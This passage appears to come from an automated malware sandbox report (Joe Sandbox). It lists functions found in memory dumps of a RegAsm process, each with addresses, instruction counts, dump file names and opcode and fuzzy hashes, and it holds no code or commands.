                                                                                          • Instruction Fuzzy Hash: 4291E272A202159BCB08CF79C8916BEBBF1FF88311F19C2A9D816DB395D634D941CB50
                                                                                          Function 032B81CC Relevance: .2, Instructions: 232COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe617dcd0ffb2a0d058592bfc714c9c523cadf97eae249ac892d2335c4f9fb2a
                                                                                          • Instruction ID: 804052f92f3ec351fb42cb57412f0a55a3cd6785b2c36f128796c6b803cde123
                                                                                          • Opcode Fuzzy Hash: fe617dcd0ffb2a0d058592bfc714c9c523cadf97eae249ac892d2335c4f9fb2a
                                                                                          • Instruction Fuzzy Hash: 5D81A772E205969BCB14CF69C8805FEB7F9FF88350B18436AD869E7280D774D991CB90
                                                                                          Function 03200E59 Relevance: .2, Instructions: 231COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a6c5ba0c5815c924f6f29983ef3b85638badebb77b1dcdc3ddceeda75bfc3c9
                                                                                          • Instruction ID: 76d38521b561ba59653518f0e28a9aa04f6f8211b5f0d56a743ac6e60edd58bb
                                                                                          • Opcode Fuzzy Hash: 9a6c5ba0c5815c924f6f29983ef3b85638badebb77b1dcdc3ddceeda75bfc3c9
                                                                                          • Instruction Fuzzy Hash: 6E81D435A201599FDB14CE59C884AAFBBB3FFC5300B28C295E8559B386D770E985CB90
                                                                                          Function 032AE4F6 Relevance: .2, Instructions: 224COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 826efdf9d31ee86483e9a95f4f50e31473a787cd510dd077f3f5c983e37e4a38
                                                                                          • Instruction ID: 1cac2a3578f04d8391f886901731b6f6bd1c010f65bb342b7f29ff1e6467dd42
                                                                                          • Opcode Fuzzy Hash: 826efdf9d31ee86483e9a95f4f50e31473a787cd510dd077f3f5c983e37e4a38
                                                                                          • Instruction Fuzzy Hash: 8B81A276E106159BCB18CF9DC4916ADFBF1EF88310B1A81AAD815EF385D7709982CB90
                                                                                          Function 032AB52F Relevance: .2, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                          • Instruction ID: 491e0af5e0602d8c7a87b15b43f5572283cd757b4dcac35034e3455901209967
                                                                                          • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                          • Instruction Fuzzy Hash: D371B536A20A1A9BCF10CFA9C890ABEF7F9AF45741F19415AD8019B340E3B4D9C1CB90
                                                                                          Function 032BAB40 Relevance: .2, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                          • Instruction ID: 27b56adab1ecaff4dc06f79fe66b02cf8896e6177af4f77016330b61f9b71879
                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                          • Instruction Fuzzy Hash: BB819375A2020A9FCF18CF58C490AEEB7F6FF84350F188169D9269B344D774E981CB50
                                                                                          Function 0321D090 Relevance: .2, Instructions: 217COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                          • Instruction ID: b840e5ca587430114168895370e0cb400ea4122d64e4dcc7d6614c5a37ae55d7
                                                                                          • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                          • Instruction Fuzzy Hash: 0F818C76E2111ACBDF14DF68C9807EDF7B6EB84710F1A816AEC15BB340D6719B808B91
                                                                                          Function 0322E284 Relevance: .2, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4d8fcb9032daa5112520daa13ad8149627181683700bbdb3eb0ee36052e43c54
                                                                                          • Instruction ID: 7f52c750c1f2cf2a94fa3c5f2c0db4220fc0356afbdc07dd2d05adff2c585273
                                                                                          • Opcode Fuzzy Hash: 4d8fcb9032daa5112520daa13ad8149627181683700bbdb3eb0ee36052e43c54
                                                                                          • Instruction Fuzzy Hash: 52817B71A20719EFDB21CFA5C880AEEBBF9FF48310F154429E556A7250DB70AC85DB60
                                                                                          Function 0321B950 Relevance: .2, Instructions: 209COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 294717cad80f5c0b253d488250a103e7efe49a15243ab7c08229a09bbf257d4d
                                                                                          • Instruction ID: 0b0bbbec22951861960a9ff6b39831ca974a2764bcccd210f24f299181a3265b
                                                                                          • Opcode Fuzzy Hash: 294717cad80f5c0b253d488250a103e7efe49a15243ab7c08229a09bbf257d4d
                                                                                          • Instruction Fuzzy Hash: 8B7137342343518FE724CE2ACA80772B7F2AB94744F198599F892CF1C4C776E992CB60
                                                                                          Function 0320C640 Relevance: .2, Instructions: 206COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f65937a48bfd92cf034c78c79c5004e34f7cb077c8f2fd044615b7371fde33b4
                                                                                          • Instruction ID: 703e47a554030e531a7c770648c2ec516adf0d4caa8dfb920c706fc69f15af10
                                                                                          • Opcode Fuzzy Hash: f65937a48bfd92cf034c78c79c5004e34f7cb077c8f2fd044615b7371fde33b4
                                                                                          • Instruction Fuzzy Hash: E071D0B5D25225DBCB25CF58D4907BDBBF8FF48700F14425AE841AB390D3B49984CB90
                                                                                          Function 032ADAC6 Relevance: .2, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e05baadc38a8c87b55839546d44cd22389ca198f11b6d89710aba78d9eff0140
                                                                                          • Instruction ID: b4038303621c5ca2a54fc5362b1108c9826ac91f5616609071bc23d112545ebf
                                                                                          • Opcode Fuzzy Hash: e05baadc38a8c87b55839546d44cd22389ca198f11b6d89710aba78d9eff0140
                                                                                          • Instruction Fuzzy Hash: 3B81AC70D10A86DFCB24CF6AC450AAAFBF6EF49300F448499E595ABA45D3B4E881DF50
                                                                                          Function 032B70E9 Relevance: .2, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c2ec3c3c2373390d9bfb04c023b6ad8ca9f32900991a2cfe6e447a4121aca03a
                                                                                          • Instruction ID: e119f55e20a3e84107dacccf17b2e2e508fd253e1da7391d02a47b2d888eeee8
                                                                                          • Opcode Fuzzy Hash: c2ec3c3c2373390d9bfb04c023b6ad8ca9f32900991a2cfe6e447a4121aca03a
                                                                                          • Instruction Fuzzy Hash: A161C775E303179BCB14EEA9C8919FFB779AF84740F14443AE951AB240DBB0D9C58BA0
                                                                                          Function 0320260B Relevance: .2, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7f88477efde9b801789be140bd9b4887a52e374c2776a98e5265928cf7fb353
                                                                                          • Instruction ID: c0b0b82b480bed929c7d898a748f87a630b7b02a1d0d41f7d0404ce8c467e19a
                                                                                          • Opcode Fuzzy Hash: b7f88477efde9b801789be140bd9b4887a52e374c2776a98e5265928cf7fb353
                                                                                          • Instruction Fuzzy Hash: A171C535624742DFC311DF28C484B6AB7E5FF84710F0889AAE859CB392DB74D989CB91
                                                                                          Function 032AF0CC Relevance: .2, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eb745e98db303f58ab00ad0dfca8881ad9845c029df44c18552552d96e453a1b
                                                                                          • Instruction ID: d34f8292753d0677db2b35b4e8a40ffa788203285830ad5ceeb290a734e9d03a
                                                                                          • Opcode Fuzzy Hash: eb745e98db303f58ab00ad0dfca8881ad9845c029df44c18552552d96e453a1b
                                                                                          • Instruction Fuzzy Hash: 85719F79A20A22EBCB24CF5DCA8017AF7F1FF44705B69446ED98297640D378E9D1CB90
                                                                                          Function 0327035C Relevance: .2, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                          • Instruction ID: 4912fbe3faa23cba9c84d2bd3b2851ade928c2ff016940f631680eb767458765
                                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                          • Instruction Fuzzy Hash: 3B718F75A20609EFCB10DFA5C984EDEBBB8FF48700F144569E505EB290DB74EA85CB90
                                                                                          Function 032862A0 Relevance: .2, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 158b5756bc8b2961aa10a8094f3095e5447ab361d22550128c74b676b4e4897c
                                                                                          • Instruction ID: a86773ae43a1df03fc41475c1658e2f63f75be87240cbda2726048c2aa42aa30
                                                                                          • Opcode Fuzzy Hash: 158b5756bc8b2961aa10a8094f3095e5447ab361d22550128c74b676b4e4897c
                                                                                          • Instruction Fuzzy Hash: 1E71E076221B01AFE731EF14C845F6AB7A6EB44720F184928E3568B2E0D7B5E9C4CB50
                                                                                          Function 032B7A46 Relevance: .2, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be7d05bad2a7d5860fb4d16313d5c38f87df2efa7da2286d9b4b1d028af8d72e
                                                                                          • Instruction ID: 45fdb4ce9c05ae2132b63d6a3869dd035c682139418c50ed13c396b5951cffef
                                                                                          • Opcode Fuzzy Hash: be7d05bad2a7d5860fb4d16313d5c38f87df2efa7da2286d9b4b1d028af8d72e
                                                                                          • Instruction Fuzzy Hash: 09513E75A202265BCB18DF6DC8809FAB7F6EFC8350F184159EC55DB385DA74C982CB90
                                                                                          Function 032B132D Relevance: .2, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1e73a882dd77f55c82b285162906488197baf2d9b66a0bbe104eef44f66ff5f
                                                                                          • Instruction ID: ca724b59b4fd604fe9b742565b2d95fd708594f002f916a247a73648679ec969
                                                                                          • Opcode Fuzzy Hash: f1e73a882dd77f55c82b285162906488197baf2d9b66a0bbe104eef44f66ff5f
                                                                                          • Instruction Fuzzy Hash: F0818075A10246DFCB09CF68C490AAEBBF1FF48340F1981A9D859EB355D734EA51CBA0
                                                                                          Function 032B903E Relevance: .2, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9c1e9fb8fae53156f5f75e7bffe344dcb972bfd19eb09293c7524e09bf888c0
                                                                                          • Instruction ID: c102c7a30789a7c0a0c307db0c696b0063f80a9f5d38f4c96cf99ecd49e45d43
                                                                                          • Opcode Fuzzy Hash: c9c1e9fb8fae53156f5f75e7bffe344dcb972bfd19eb09293c7524e09bf888c0
                                                                                          • Instruction Fuzzy Hash: 1261C075620716AFD715DF68C884BEBBBB8FF48780F048619E9A987240DB70E5C4CB90
                                                                                          Function 032BFCF2 Relevance: .2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 330f3e2eb7f0af49349b7af7b47ba2af44992e097a82253bc4aa97b2414aa35f
                                                                                          • Instruction ID: 6e0a572e29053bb2d2381137f8c696e3d53b9808251c171a559c8bf35eaf5af1
                                                                                          • Opcode Fuzzy Hash: 330f3e2eb7f0af49349b7af7b47ba2af44992e097a82253bc4aa97b2414aa35f
                                                                                          • Instruction Fuzzy Hash: D261D131A2020AAFCB04DF68CD81AFEB7F5FF48350F208569E515EB280D770A995CB90
                                                                                          Function 031F7703 Relevance: .2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 16e92551b1503fd502b5e6d8f7750b1dfff01bb917aa98383e70cea4078f03f2
                                                                                          • Instruction ID: a5737681c1e84c2628b318a4fe61af595c3cf8a0434b76be5a3f3c348dc113eb
                                                                                          • Opcode Fuzzy Hash: 16e92551b1503fd502b5e6d8f7750b1dfff01bb917aa98383e70cea4078f03f2
                                                                                          • Instruction Fuzzy Hash: DE618575A10605EFDB18DF68D480AADFBB5BF88240F18826ED519AB340DB30A955CBD0
                                                                                          Function 032B92A6 Relevance: .2, Instructions: 174COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a8eb33ead0cd1224c97e0b2e064c073d00c5682fdb04b8025b05792ae08cc436
                                                                                          • Instruction ID: 376e1cdf6ed1c275f133920911a398abef1c2b23231a0c0043d3a01801f4db32
                                                                                          • Opcode Fuzzy Hash: a8eb33ead0cd1224c97e0b2e064c073d00c5682fdb04b8025b05792ae08cc436
                                                                                          • Instruction Fuzzy Hash: DF61F4356287828BD311CF64C494BEAF7F0BF80784F18446DEA958B291D7B5E8C5CB91
                                                                                          Function 032BCE93 Relevance: .2, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                          • Instruction ID: 37835dfb86959710e4d9cc9ce8b4044c0990e2589ed2e0c2b4fd601a50756647
                                                                                          • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                          • Instruction Fuzzy Hash: 7B51E9326247239BC714DE2988507EBB7FAAFC03D0F1D84AEE895CB245DA70D9858791
                                                                                          Function 004103F3 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                          • Instruction ID: 47d524ba40d2d2ba486d7c3e34c48d42f1509d8a490e1d1918405b526154043f
                                                                                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                          • Instruction Fuzzy Hash: CE5182B3E54A214BD3188E09CC40631B792EFC8312B5F81BADD199B357CE74E9529A90
                                                                                          Function 031EB2D3 Relevance: .2, Instructions: 161COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fffe432225bf4a7a52cc87bb384fe9288a34476afb5e62e100daedffd67c4d2f
                                                                                          • Instruction ID: d38735eb14267b287f31262825ee1461562163fba23f487c6eddd05b1e66dae6
                                                                                          • Opcode Fuzzy Hash: fffe432225bf4a7a52cc87bb384fe9288a34476afb5e62e100daedffd67c4d2f
                                                                                          • Instruction Fuzzy Hash: AE416B72218B10EFCB2ADF15D881B26B7A9EF48710F15846AE609CF290D7B5DC80CB90
                                                                                          Function 032B7D73 Relevance: .2, Instructions: 160COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a459a1ade92823a90cfcfa5d12cef8be33b5a6ed62df883792ef5cb84dcab028
                                                                                          • Instruction ID: a12661acb82104ae8d946ccf4b6d08d52f221599fa8d40e0d71fe17542c39b19
                                                                                          • Opcode Fuzzy Hash: a459a1ade92823a90cfcfa5d12cef8be33b5a6ed62df883792ef5cb84dcab028
                                                                                          • Instruction Fuzzy Hash: 0051B136A2014A8BCB08CF6CC480AEEB7F5EF98354F19826AD815DB355E734DA55CB90
                                                                                          Function 03203740 Relevance: .2, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f7835b4dd396d3bba05bec0543ea02eefa0ca355cf852657f57f82edc224e89e
                                                                                          • Instruction ID: 1c074516da9746a583f5522051883336bbccbc0e112f9bb4e2f67223ebbf15df
                                                                                          • Opcode Fuzzy Hash: f7835b4dd396d3bba05bec0543ea02eefa0ca355cf852657f57f82edc224e89e
                                                                                          • Instruction Fuzzy Hash: D2511179A20616EFC311CF68D4846A9B7B4FF04710F0886A9E845DB392E734E9D9CBC0
                                                                                          Function 031F7152 Relevance: .2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7018f0a86eb74c1ad419f3fd99d822d03bcada5828085a723280c938fa33f3c
                                                                                          • Instruction ID: c313f28c2d8b172a88e811af9cbf158f0e7f23f1eece67fbf28a6753572f333a
                                                                                          • Opcode Fuzzy Hash: d7018f0a86eb74c1ad419f3fd99d822d03bcada5828085a723280c938fa33f3c
                                                                                          • Instruction Fuzzy Hash: D3514834A14606EFEF05EF68C844BBDB7B4FF08350F144169E912972D0DBB4AA95CB80
                                                                                          Function 03273A6C Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 404288ead4a9357b09c9166d3436a367f00aadf811c346e1fab73b14bbd58792
                                                                                          • Instruction ID: 89d10aff98e977eebdbfdb88ca16718dd0d532fdaa3d3183b6784d68950625bb
                                                                                          • Opcode Fuzzy Hash: 404288ead4a9357b09c9166d3436a367f00aadf811c346e1fab73b14bbd58792
                                                                                          • Instruction Fuzzy Hash: FF518276E6011E4BDF25CA68D462BEFF3F2FB45310F48041AE515BB3C0C67A6986E550
                                                                                          Function 032BD26B Relevance: .2, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                          • Instruction ID: 43df9ff963e4b0c992be53346b87ebf50cb3175ba0db470cf2cec1e75141dbe5
                                                                                          • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                          • Instruction Fuzzy Hash: E7515D756283429FD714CF68C880B9ABBF5FBC8384F04892DF9949B241D774E985CB52
                                                                                          Function 032B7571 Relevance: .2, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a41396e3e54c1cf378f5a6ae82b9d10a46698f9401e4b0cb0834caf59bd094b8
                                                                                          • Instruction ID: 78d49305771cd475fd77cc524d540dffd2a1b46e34023d18ea2655041c3cf2e4
                                                                                          • Opcode Fuzzy Hash: a41396e3e54c1cf378f5a6ae82b9d10a46698f9401e4b0cb0834caf59bd094b8
                                                                                          • Instruction Fuzzy Hash: A051E831E2011AABCB15DF6DD844AAEFBB9FF88390F184169D915DB250DB70AD91CBC0
                                                                                          Function 031F51ED Relevance: .1, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
